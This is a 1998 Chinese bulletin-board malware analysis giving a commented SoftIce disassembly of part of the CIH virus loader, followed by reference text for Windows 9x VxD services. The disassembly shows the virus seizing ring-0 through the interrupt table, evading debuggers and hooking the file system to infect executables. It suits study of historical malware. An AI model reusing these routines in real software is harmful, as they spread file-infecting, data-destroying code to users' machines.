发信人: diagnoser()
整理人: emil(1999-02-05 00:18:06), 站内信件
|
发信人: TBsoft (TBsoft), 信区: Virus
标 题: SoftIce分析的结果[转载]
发信站: 武汉白云黄鹤站 (Mon Oct 26 10:51:47 1998) , 站内信件
发信人: [email protected] (真生命), 信区: virus
标 题: SoftIce分析的结果
发信站: 中国科大BBS站 (Sun Oct 25 10:37:13 1998)
转信站: wuheebbs!ustcnews!ustcbbs
CIH 的分析
被感染的EXE :Sthcd.exe
文件长度 :209KB
入口:
CS:EIP=0137:004002A1 SS:ESP=013F:0069FE38
EAX=004002A0 EBX=00000000 ECX=8159970C EDX=8159974C
ESI=815996EC EDI=81599A08 EBP=0069FF78 EFL=00000A86
DS=013F ES=013F FS=37E7 GS=0000
0137:004002A0 PUSH EBP
0137:004002A1 LEA EAX,[ESP-08] SS:0069FE30=BFF742F3
0137:004002A5 XOR EBX,EBX
0137:004002A7 XCHG EAX,FS:[EBX] ;FS是谁的段??
0137:004002AA CALL 004002AF
0137:004002AF POP EBX ;EBX等于上一句的返回地址
0137:004002B0 LEA ECX,[EBX+42]
0137:004002B3 PUSH ECX
0137:004002B4 PUSH EAX
0137:004002B5 PUSH EAX ;这4字节作为缓冲区
0137:004002B6 SIDT FWORD PTR [ESP-02]
;取中断描述符表寄存器(48字节)
0137:004002BB POP EBX ;得到中断描述符表基址
0137:004002BC ADD EBX,1C ;每个描述项占8字节
0137:004002BF CLI ;加1C则指向Int 3的描述项
0137:004002C0 MOV EBP,[EBX]
0137:004002C2 MOV BP,[EBX-04] ;保存Int 3的处理入口于EBP中
0137:004002C6 LEA ESI,[ECX+12] ;取新的Int 3的处理入口于ESI中
0137:004002C9 PUSH ESI
0137:004002CA MOV [EBX-04],SI
0137:004002CE SHR ESI,10
0137:004002D1 MOV [EBX+02],SI
0137:004002D5 POP ESI ;设置新的Int 3的处理入口,本例中ESI=0x00400303
0137:004002D6 INT 3
0137:004002D7 PUSH ESI ;保存ESI
0137:004002D8 MOV ESI,EAX
0137:004002DA MOV ECX,[EAX-04]
0137:004002DD REPZ MOVSB ;传送一块病毒体到申请的线性内存
0137:004002DF SUB EAX,08
0137:004002E2 MOV ESI,[EAX] ;传送完了么?
0137:004002E4 OR ESI,ESI
0137:004002E6 JZ 004002EA ;完则跳转
0137:004002E8 JMP 004002DA ;否则循环
;本例中病毒体分为四块,大小分为0x160,0xc8
0xc9,0xfa,合计1003字节
0137:004002EA POP ESI ;恢复ESI
0137:004002EB INT 3 ;安装文件监视的服务,Important!!!!
;置回Int 3的处理入口
0137:004002EC STI
0137:004002ED XOR EBX,EBX
0137:004002EF JMP 004002F8
0137:004002F1 XOR EBX,EBX
0137:004002F3 MOV EAX,FS:[EBX]
0137:004002F6 MOV ESP,[EAX]
0137:004002F8 POP DWORD PTR FS:[EBX]
0137:004002FB POP EAX
0137:004002FC POP EBP
0137:004002FD PUSH 0040A010 ;恢复原程序的运行
0137:00400302 RET
;新的Int 3的处理入口
0137:00400303 JZ 00400337
0137:00400305 MOV ECX,DR0 ;DR0调试断点一,检测调试程序
0137:00400308 JECXZ 0040031A ;无则跳转
0137:0040030A ADD DWORD PTR [ESP],15
0137:0040030E MOV [EBX-04],BP ;置回Int 3的处理入口
0137:00400312 SHR EBP,10
0137:00400315 MOV [EBX+02],BP
0137:00400319 IRETD
0137:0040031A MOV DR0,EBX ;破坏追踪
0137:0040031D PUSH 0F
0137:0040031F PUSH ECX ;ECX必须为零,For PG_VM
0137:00400320 PUSH FF ;VM Handle
0137:00400322 PUSH ECX ;Physical address is a multiple of 4K.
0137:00400323 PUSH ECX ;
0137:00400324 PUSH ECX
0137:00400325 PUSH 01
0137:00400327 PUSH 02 ;PAGEUSEALIGN
0137:00400329 INT 20 VXDCall _PageAllocate ;申请一块线性内存
0137:0040032F ADD ESP,20
0137:00400332 XCHG EAX,EDI ;基址置于EDI中
0137:00400333 LEA EAX,[ESI-63] ;取第一块病毒体的地址
0137:00400336 IRETD
0137:00400337 LEA EAX,[EDI-0309]
0137:0040033D PUSH EAX
0137:0040033E INT 20 VXDCall IFSMgr_InstallFileSystemApiHook
;安装文件监视的服务,Important!!!!
0137:00400344 MOV DR0,EAX
0137:00400347 POP EAX
0137:00400348 MOV ECX,[ESI+3D]
0137:0040034B MOV EDX,[ECX]
0137:0040034D MOV [EAX-04],EDX
0137:00400350 LEA EAX,[EAX-2A]
0137:00400353 MOV [ECX],EAX
0137:00400355 CLI
0137:00400356 JMP 0040030E
0137:00400358 PUSH EBX
0137:00400359 CALL 0040035E
0137:0040035E POP EBX
0137:0040035F ADD EBX,24
0137:00400362 PUSH EBX
0137:00400363 INT 20 VXDCall IFSMgr_RemoveFileSystemApiHook
0137:00400369 POP EAX
0137:0040036A PUSH DWORD PTR [ESP+08]
0137:0040036E CALL [EBX-04]
0137:00400371 POP ECX
0137:00400372 PUSH EAX
0137:00400373 PUSH EBX
0137:00400374 CALL [EBX-04]
0137:00400377 POP ECX
0137:00400378 MOV DR0,EAX
0137:0040037B POP EAX
0137:0040037C POP EBX
0137:0040037D RET
0137:0040037E CMP AL,0E
0137:00400381 SHL BYTE PTR [EAX-18],00
0137:00400385 ADD [EAX],AL
0137:00400387 ADD [ESI-7F],BL
0137:0040038A MOV BYTE PTR [EBX],03
0137:0040038D ADD [EAX],AL
0137:0040038F TEST BYTE PTR [ESI],01
0137:00400392 JNZ 00400588
0137:00400398 LEA EBX,[ESP+28]
0137:0040039C CMP DWORD PTR [EBX],24
0137:0040039F JNZ 00400582
0137:004003A5 INC BYTE PTR [ESI]
0137:004003A7 ADD ESI,05
0137:004003AA PUSH ESI
0137:004003AB MOV AL,[EBX+04]
0137:004003AE CMP AL,FF
0137:004003B0 JZ 004003BA
0137:004003B2 ADD AL,40
0137:004003B4 MOV AH,3A
0137:004003B6 MOV [ESI],EAX
0137:004003B8 INC ESI
0137:004003B9 INC ESI
0137:004003BA PUSH 00
0137:004003BC PUSH 7F
0137:004003BE MOV EBX,[EBX+10]
0137:004003C1 MOV EAX,[EBX+0C]
0137:004003C4 ADD EAX,04
0137:004003C7 PUSH EAX
0137:004003C8 PUSH ESI
0137:004003C9 INT 20 VXDCall UniToBCSPath
0137:004003CF ADD ESP,10
0137:004003D2 CMP DWORD PTR [EAX+ESI-04],4558452E
0137:004003DA POP ESI
0137:004003DB JNZ 0040057F
0137:004003E1 CMP WORD PTR [EBX+18],01
0137:004003E6 JNZ 0040057F
0137:004003EC MOV AX,4300
0137:004003F0 INT 20 VXDCall IFSMgr_Ring0_FileIO
0137:004003F6 JB 0040057F
0137:004003FC PUSH ECX
0137:004003FD MOV EDI,[ESI+00000062]
0137:00400403 ADD [EAX],AL
0137:00400405 ADD [EAX],AL
0137:00400407 ADD [EAX],AL
0137:00400409 ADD [EAX],AL
0137:0040040B ADD [EAX],AL
0137:0040040D ADD [EAX],AL
0137:0040040F ADD [EAX],AL
0137:00400411 ADD [EAX],AL
0137:00400413 ADD [EAX],AL
0137:00400415 ADD [EAX],AL
0137:00400417 ADD [EAX],AL
0137:00400419 ADD [EAX],AL
0137:0040041B ADD [EAX],AL
0137:0040041D ADD [EAX],AL
0137:0040041F ADD [EAX],AL
0137:00400421 ADD [EAX],AL
0137:00400423 ADD [EAX],AL
0137:00400425 ADD [EAX],AL
0137:00400427 ADD [EAX],AL
0137:00400429 ADD [EAX],AL
0137:0040042B ADD [EAX],AL
0137:0040042D ADD [EAX],AL
0137:0040042F ADD [EAX],AL
0137:00400431 ADD [EAX],AL
0137:00400433 ADD [EAX],AL
0137:00400435 ADD [EAX],AL
0137:00400437 ADD [EAX],AL
0137:00400439 ADD [EAX],AL
0137:0040043B ADD [EAX],AL
0137:0040043D ADD [EAX],AL
//以上是病毒体的第一部分
注释:
VXD服务
1. _PageAllocate
C语言原型:ULONG EXTERN _PageAllocate(ULONG nPages, ULONG pType, ULONG
VM,
ULONG AlignMask, ULONG minPhys, ULONG maxPhys, ULONG *PhysAddr,
ULONG flags);
0137:0040031D PUSH 0F
0137:0040031F PUSH ECX
0137:00400320 PUSH FF
0137:00400322 PUSH ECX
0137:00400323 PUSH ECX
0137:00400324 PUSH ECX
0137:00400325 PUSH 01
0137:00400327 PUSH 02
#define PG_VM 0
#define PG_SYS 1
#define PG_RESERVED1 2
#define PG_PRIVATE 3
#define PG_RESERVED2 4
#define PG_RELOCK 5 /* PRIVATE to MMGR */
#define PG_INSTANCE 6
#define PG_HOOKED 7
#define PG_IGNORE 0xFFFFFFFF
#define PAGEZEROINIT 0x00000001
#define PAGEUSEALIGN 0x00000002
#define PAGECONTIG 0x00000004
#define PAGEFIXED 0x00000008
#define PAGEDEBUGNULFAULT 0x00000010
#define PAGEZEROREINIT 0x00000020
#define PAGENOCOPY 0x00000040
#define PAGELOCKED 0x00000080
#define PAGELOCKEDIFDP 0x00000100
#define PAGESETV86PAGEABLE 0x00000200
#define PAGECLEARV86PAGEABLE 0x00000400
#define PAGESETV86INTSLOCKED 0x00000800
#define PAGECLEARV86INTSLOCKED 0x00001000
#define PAGEMARKPAGEOUT 0x00002000
#define PAGEPDPSETBASE 0x00004000
#define PAGEPDPCLEARBASE 0x00008000
#define PAGEDISCARD 0x00010000
#define PAGEPDPQUERYDIRTY 0x00020000
#define PAGEMAPFREEPHYSREG 0x00040000
#define PAGENOMOVE 0x10000000
#define PAGEMAPGLOBAL 0x40000000
#define PAGEMARKDIRTY 0x80000000
2.IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook(
pIFSFileHookFunc HookFunc
)
3.IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook(
pIFSFileHookFunc HookFunc
)
4.UniToBCSPath
UniToBCSPath(
unsigned char * pBCSPath,
ParsedPath * pUniPath,
unsigned int maxLength,
int charSet
)
This service converts a canonicalized unicode pathname to a normal pathname in the
specified BCS character set i.e. the path element lengths are converted into proper
path separators in addition to the character set conversion. Currently, the Windows
ANSI codepage or the current OEM codepage in the system can be specified for the
conversion. It is important to note that the source and destination buffers cannot
be the same nor can they overlap. They should be two separate buffers. This service
does not terminate the converted path with a NUL character, the caller of the service
needs to do this, if necessary.
5.IFSMgr_Ring0_FileIO
This service provides a register-based VxD callable interface to the common filesystem
functions. Other VxDs in the system can use this service to make filesystem calls without
having to issue int 21h calls. An FSD itself can call this interface to do filesystem
operations in certain situations. The different functions provided as part of this
service are described below. Since these calls can be made only by 'trusted' system
components, the IFS manager does not do any parameter validation on them. Users of this
service should be very careful to check that they are passing in valid parameters.
OpenCreateFile
This interface is the same as the interface for the int 21h extended open function
(06Ch ). If the R0_OPENCREATFILE function code is used, the operation is done in an
independent context, so that handle is globally accessible from any VM. If the
R0_OPENCREAT_IN_CONTEXT function code is used, the operation is done in the context
of the current thread and process.
[EAX]
R0_OPENCREATFILE or RO_OPENCREAT_IN_CONTEXT
[BX]
Open mode and other flags. The flags are exactly the same as those on the int 21h
function 6Ch. Please refer to the specification of the int 21h function for details.
[CX]
Attributes to use on a create operation.
[DL]
Action to be performed. Look at the int 21h, function 6ch documentation for details.
[DH]
Special flags that are available only on this api. This register is reserved and not used on the int
21h, function 6Ch api.
Special Ring 0 Api Open Flags:
Value Meaning
R0_NO_CACHE Indicates that reads and writes on the file should not be cached.
All operations will be directly done to the disk.
R0_SWAPPER_CALL Indicates that the i/o operation is being performed to the system
swap file. This is a privileged call that should be set only by the
memory manager when it is doing i/o to page stuff in and out of the disk.
The filesystem that handles swap file io needs to ensure certain
conditions to prevent deadlocks. These are described in section 8.3.4
of this document.
[ESI]
Flat pointer to the pathname of the file to be opened/created.
?Carry flag clear, operation was successful.
[EAX] Handle to opened file.
[ECX] Actual action performed. For the return values, please refer to the document describing
the int 21h, function 6Ch api.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, ECX, Flags.
ReadFile
This function is called to read a file previously opened by OpenCreateFile. The handle must be
one returned from the OpenCreateFile service described above, it cannot be a handle opened
by issuing an int 21h. If the R0_READFILE_IN_CONTEXT function code i
[EAX]
R0_READFILE or R0_READFILE_IN_CONTEXT.
[EBX]
File handle.
[ECX]
Count of bytes to be read. This can be a full 32-bit transfer count.
[EDX]
Position in file the read operation needs to start at.
[ESI]
Flat pointer to the buffer the data is to read into.
?Carry flag clear, no error.
[ECX] Number of bytes actually read.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, ECX, Flags.
WriteFile
This function is called to write to a file previously opened by OpenCreateFile. The handle must
be one returned from the OpenCreateFile service described above, it cannot be a handle
opened by issuing an int 21h. If the R0_WRITEFILE_IN_CONTEXT function c
[EAX]
R0_WRITEFILE or R0_WRITEFILE_IN_CONTEXT
[EBX]
File handle.
[ECX]
Count of bytes to be written. This can be a full 32-bit transfer count.
[EDX]
Position in file the write operation needs to start at.
[ESI]
Flat pointer to the buffer that contains the data to be written.
?Carry flag clear, no error.
[ECX] Number of bytes actually written.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, ECX, Flags.
CloseFile
This function is called to close a file previously opened by OpenCreateFile. The handle must be
one returned from the OpenCreateFile service described above, it cannot be a handle opened
by issuing an int 21h.
[EAX]
R0_CLOSEFILE
[EBX]
File handle
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
GetFileSize
This function is called to get the size of a file previously opened by OpenCreateFile. The handle
must be one returned from the OpenCreateFile service described above, it cannot be a handle
opened by issuing an int 21h.
[EAX]
R0_GETFILESIZE
[EBX]
File handle
?Carry flag clear, no error.
[EAX] Size of the file in bytes.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
FindFirstFile
This function is called to performa FindFirst operation. This function provides the same
functionalit as the FindFirst int 21h function 714Eh and supports long filenames.
[EAX]
R0_FINDFIRSTFILE
[CX]
Must match attributes to be used for the find operation.
[ESI]
Flat pointr to pathname the find operation is to be done on.
[EDX]
Flat pointer to buffer to contain the results of the find operation. This buffer should be in the
_WIN32_FIND_DATA structure format.
?Carry flag clear, no error.
[EAX] Find context handle to be used for a subsequent FindNextFile operation.
The find data buffer is filled in appropriately.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
FindNextFile
This function is called to performa FindNext operation. The handle used for this call must be one
obtained by calling the FindFirstFile service described above, it cannot be a handle obtained by
issuing an int 21h call.
[EAX]
R0_FINDFIRSTFILE
[EBX]
Find context handle obtained by calling FindFirstFile.
[EDX]
Flat pointer to buffer to contain the results of the find operation. This buffer should be in the
_WIN32_FIND_DATA structure format.
?Carry flag clear, no error.
The find data buffer is filled in appropriately.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
FindCloseFile
This function is called to terminate a Find operation. The handle used for this call must be one
obtained by calling the FindFirstFile service described above, it cannot be a handle obtained by
issuing an int 21h call.
[EAX]
R0_FINDCLOSEFILE
[EBX]
Find context handle obtained by calling FindFirstFile.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
FileAttributes
This function is called to get or set the current attributes of a file. It provides the same
functionality as the int 21h function 7143h.
[AH]
R0_FILEATTRIBUTES
[AL]
GET_ATTRIBUTES to get the attributes of a file.
SET_ATTRIBUTES to set the attributes of a file.
[CX]
Attributes of the file, valid only for the SET_ATTRIBUTES operation.
[ESI]
Flat pointer to a pathname for the file whose attributes need to be returned.
?Carry flag clear, no error.
[CX] Attributes of the file returned only on the GET_ATTRIBUTES operation.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
EAX, ECX, Flags.
RenameFile
This function is called to rename a file. This provides the same functionality as the int 21h
function 7156h.
[EAX]
R0_RENAMEFILE
[ESI]
Flat pointer to source pathname of filename that is to be renamed.
[EDX]
Flat pointer to destinaton pathname to which the filename is to be renamed.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
Flags.
DeleteFile
This function is called to delete a file. This provides the same functionality as the int 21h function
7141h.
[EAX]
R0_DELETEFILE
[CX]
Attributes for the delete operation. This has the search attribute and the must-match attribute just
like the int 21h, function 7141h. Refer to the documentation of the int 21h function for details
about the attributes.
[ESI]
Flat pointer to pathname of file(s) to be deleted. Wildcards are allowed.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
Flags.
LockFile
This function is called to perform record locking operations on files. This provides the same
functionality as the int 21h function 5Ch. The handle passed in should be obtained by calling the
OpenCreateFile function described above, it cannot be a handle
[AH]
R0_FILELOCKS
[AL]
LOCK_REGION to take a record lock.
UNLOCK_REGION to release a record lock.
[EBX]
Handle to file.
[ECX]
Process id of the process on whose behalf the locking operation is to be issued.
[EDX]
Offset of the region that is to be locked.
[ESI]
Length of the region that is to be locked.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
Flags.
GetDiskFreeSpace
This function returns the current disk free space statistics. It provides the same functionality as int
21h function 36h.
[EAX]
R0_GETDISKFREESPACE
[DL]
1-based driveletter whose disk freespace is desired (0 = default drive, 1= A, 2 = B,...)
?Carry flag clear, no error.
[AX] Number of sectors per cluster.
[BX] Number of available clusters on disk.
[CX] Number of bytes per sector.
[DX] Total number of clusters on disk.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used AX, BX, CX, DX, Flags.
ReadAbsoluteDisk
This function is called to read absolute sectors from the disk. It provides the same functionality
as the int 25h interface.
[AH]
R0_ABSDISKREAD
[AL]
0-based driveletter the operation is to be done on (0 = A, 1 = B,...).
[ECX]
Number of sectors to read.
[EDX]
Starting sector number for the read.
[ESI]
Flat pointer to buffer the read is to be done into.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
Flags.
WriteAbsoluteDisk
This function is called to write absolute sectors to the disk. It provides the same functionality as
the int 26h interface.
[AH]
R0_ABSDISKWRITE
[AL]
0-based driveletter the operation is to be done on (0 = A, 1 = B,...).
[ECX
Number of sectors to write.
[EDX]
Starting sector number for the write.
[ESI]
Flat pointer to buffer containing the data to be written.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used
Flags.
IoctlHandle
This function is called to do a handle-based ioctl. It is currently used by certain system
components and should not be used by other VxDs. Other than the registers documented here,
the rest of the ioctl parameters depend on the specific ioctl being used
[AH]
R0_IOCTLHANDLE
[AL]
Ioctl sub-function code.
[EBX]
File or device handle.
?Carry flag clear, no error.
Carry flag set, an error occurred. [AX] contains the errorcode.
Registers Used EAX, Flags.
--
※ 来源: 中国科大BBS站 [bbs.ustc.edu.cn]
--
天生我才,就做一篇锦绣文章。
风起云涌,就挽一回狂澜巨浪。
成也堂堂!
败也堂堂!
※ 来源:·武汉白云黄鹤站 s1000e.whnet.edu.cn·[FROM: 210.42.24.31]
[分类讨论区] [全部讨论区] [上一篇] [本讨论区] [回信] [下一篇]
--
☆ 来源:.广州网易BBS站 bbs.nease.net.[FROM: 202.103.31.151]
|
|